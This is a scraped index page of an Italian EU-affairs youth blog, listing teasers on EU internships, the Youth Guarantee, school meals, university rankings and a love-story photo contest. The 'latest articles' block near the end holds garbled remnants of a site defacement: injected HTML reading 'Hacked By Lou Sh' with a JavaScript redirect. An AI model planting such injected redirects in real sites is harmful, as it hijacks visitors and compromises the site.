EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Giovani

Giovani


Giovani

it

Fiumi di inchiostro, centinaia di note e infinite pennellate di colore sono state da sempre dedicate all’amore che supera gli ostacoli, all’amore che vince, nonostante tutto.

Stavolta a celebrare l’“amor vincit omnia”, di famosa memoria virgiliana, è l’Unione europea con il concorso fotografico, "EU Love without Borders", dedicato alle storie d’amore che superano ogni ostacolo e confine, sia esso culturale, politico, linguistico, geografico, logistico o altro.

Il (...)

it

Dalla relazione, realizzata con l’ausilio del gruppo Ue di alto livello sull’alimentazione e l’attività fisica a sostegno della strategia Ue 2007 per l’alimentazione, il sovrappeso e l’obesità e per il piano d’azione dell’Ue sull’obesità infantile 2014-2020, emerge quanto per i paesi europei sia importante e fondamentale il sostegno della ristorazione scolastica per la salute, lo sviluppo e i risultati scolastici dei bambini.

Lo studio ha analizzato i dati dei 28 Stati membri dell’Ue più Norvegia e Svizzera, evidenziando come le disposizioni variano da paese a paese. Questo perché ogni qual volta si presenta la necessità di stabilire quantità e menù dei cibi da offrire ai più piccoli, le decisioni sono volontarie e non (...)

it

Mentre la disoccupazione raggiunge i nuovi massimi storici, in certi settori il lavoro non manca. Anzi, si fatica a trovare mano d’opera. E’ il caso dell’agricoltura, un settore ricco di opportunità per imparare un nuovo mestiere, armati di buona volontà e liberi da pregiudizi.

A tal proposito nasce Job in Country, la nuova piattaforma web di Confederazione Nazionale Coldiretti, come luogo di incontro tra domanda e offerta nel settore agricolo.

L’iniziativa si pone come una grande opportunità per gli studenti degli istituti tecnici agrari, per quelli degli istituti (...)

it

U-Multirank è l’innovativo sistema europeo che valuta le università con lo scopo non solo di offrire una classifica sempre aggiornata degli atenei, ma li esamina secondo determinati parametri. U-Multirank, progetto sostenuto dall’Ue attraverso 2 milioni di euro con una scadenza prevista per il 2015, consente di realizzare ricerche personalizzate a seconda delle esigenze informative di ogni utente e si focalizza sui pro e contro degli istituti di formazione.

Per il 2014, secondo il sito U-Multirank, solamente il 12% degli atenei analizzati offre un servizio idoneo classificabile come “Very Good”. In vetta alla classifica compare per l’Italia il Politecnico di Torino insieme all’MIT, Harvard e Berkeley.

Ma come si utilizza il sito? Si parte con delle (...)

it

Il documento di indirizzo sugli stage, approvato lo scorso 15 marzo dal Coreper e rivolto ai 28 Paesi membri, ha spinto l’European Youth Forum e altre organizzazioni europee che lavorano sul fronte dell’occupazione giovanile, a scrivere un’animata lettera di protesta.

Il tirocinio, che dovrebbe servire come passerella tra il mondo della formazione e quello del lavoro, spesso diventa uno strumento, nelle mani dei soggetti ospitanti, per sfruttare i giovani stagisti. Per questo, da diversi anni ormai, molte associazioni europee lavorano con lo scopo di (...)

it

“L’opera umana più bella è essere utile al prossimo”, scriveva Sofocle: migliaia di europei lavorano già come volontari nel mondo intero, assistendo vittime di catastrofi e crisi; molti altri sarebbero pronti a partire se ne avessero la possibilità.

La Commissione europea ha presentato le linee guida del programma EU Aid Volunteers, previsto dal Trattato di Lisbona, rivolto a quanti desiderano rimboccarsi le maniche per intervenire in prima persona nei luoghi colpiti da catastrofi. L’obiettivo generale è quello di fornire opportunità di (...)

it

Martedì 11 febbraio, in oltre 100 Paesi (e per la prima volta anche negli Stati Uniti), è stato celebrato il Safer Internet Day, un’iniziativa della Commissione europea, giunta ormai all’undicesima edizione, che ha avuto come fine quello di promuovere, soprattutto tra i più giovani, un utilizzo sicuro e responsabile dei media.

Erano gli anni Sessanta quando il Dipartimento di Difesa statunitense decise di collegare tra di loro alcune università che si occupavano di progetti militari, sfruttando linee di telecomunicazione ad alta velocità. L’obiettivo era semplice: mettere a punto un sistema di difesa e di (...)

it

In 2013, the United Nations did something unprecedented. It set up the UN Major Group for Children and Youth (MGCY) Policy Strategy Group. This Policy Strategy Group’s goal is to help define the World We Want Consultations on post-2015. In 2015 a global development plan called Millennium Development Goals (MDGs) will expire and governments around the world will develop a new plan to define the world’s next global development agenda set to begin in 2015

The UN Major Group for Children and Youth is a voice of children and youth and is aimed at youth bellow the age of 30 as a platform to amplify youth voices in the new development agenda.

As a youth I have been very interested in listening to the voices of my peers as expressed on the UN (...)

it

Sono 17 gli Stati membri che hanno già presentato alla Commissione europea i loro piani definitivi per attuare la Garanzia per i Giovani, ambizioso programma dell’Unione europea per rispondere alla crisi dell’occupazione giovanile.

Belgio, Bulgaria, Croazia, Cipro, Repubblica Ceca, Francia, Grecia, Ungheria, Irlanda, Italia, Lettonia, Lituania, Polonia, Portogallo, Romania, Spagna e Svezia hanno presentato le road maps per l’implementazione della Youth Guarantee. La Commissione europea sta attualmente valutando i piani e (...)

it

Entrare nel mondo del lavoro non è certo una cosa semplice al giorno d’oggi. L’Europa lo sa bene ed è per questo che ha deciso di intervenire, andando a regolamentare il settore dei tirocini. Un’offerta chiara e una formazione valida in grado di fornire le competenze utili per un futuro impiego: ecco la proposta della Commissione europea.

In un momento di profonda crisi per il mondo del lavoro e per il settore economico, dove la malinconia e lo scetticismo sembrano farla da padrona, un piccolo raggio di luce appare all’orizzonte per noi giovani. L’Unione Europea infatti non si smentisce mai e rilancia il suo impegno per (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France